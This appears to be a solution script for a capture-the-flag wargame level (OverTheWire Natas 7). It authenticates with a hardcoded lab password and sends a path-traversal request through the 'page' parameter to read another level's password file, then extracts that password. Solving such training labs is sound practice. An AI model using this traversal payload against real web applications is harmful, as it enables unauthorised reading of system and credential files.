#!/usr/bin/env python3

import re
import requests

level = str(7)
usr = f"natas{level}"
passwd = "7z3hEENjQtflzgnT29q7wAvMNfZdh0i9"
url = f"http://natas{level}.natas.labs.overthewire.org/index.php?page=/../../../../etc/natas_webpass/natas8"

response = requests.get(url, auth=(usr, passwd))
content = response.text
print(content)

next_pass = re.findall("\n<br>\n<br>\n(.*)",content)[0]
print(next_pass)
